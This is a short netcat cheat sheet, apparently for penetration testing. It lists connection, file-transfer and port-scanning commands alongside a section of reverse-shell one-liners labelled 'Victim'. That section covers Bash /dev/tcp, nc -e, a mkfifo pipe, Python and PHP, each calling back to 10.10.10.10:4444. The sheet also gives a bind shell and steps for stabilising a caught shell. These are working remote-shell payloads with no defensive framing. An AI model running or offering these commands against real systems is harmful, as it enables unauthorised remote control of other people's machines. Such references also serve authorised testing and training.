# Connect to host (client)
nc 192.168.1.1 80
# Listen on port (server)
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS
# -p port
# Banner grabbing
echo "" | nc -w1 192.168.1.1 22
# Receiver (start first)
nc -lvnp 4444 > received_file.txt
# Sender
nc 192.168.1.1 4444 < file_to_send.txt
# Directory transfer
tar czf - /path/to/dir | nc 192.168.1.1 4444 # sender
nc -lvnp 4444 | tar xzf - # receiver
# Listener (attacker machine)
nc -lvnp 4444
# Victim — Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
# Victim — Netcat (traditional)
nc -e /bin/bash 10.10.10.10 4444
# Victim — Netcat (OpenBSD, no -e)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.10.10 4444 > /tmp/f
# Victim — Python
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("10.10.10.10",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/bash","-i"])'
# Victim — PHP
php -r '$sock=fsockopen("10.10.10.10",4444); exec("/bin/bash -i <&3 >&3 2>&3");'
# Victim (waits for connection)
nc -lvnp 4444 -e /bin/bash
# Attacker (connects to victim)
nc 192.168.1.1 4444
# Scan TCP ports
nc -zv 192.168.1.1 1-1000 2>&1 | grep succeeded
# Scan UDP
nc -zvu 192.168.1.1 1-1000
# Single port check
nc -zv 192.168.1.1 22
# After catching reverse shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background
stty raw -echo; fg
# Press Enter twice
export TERM=xterm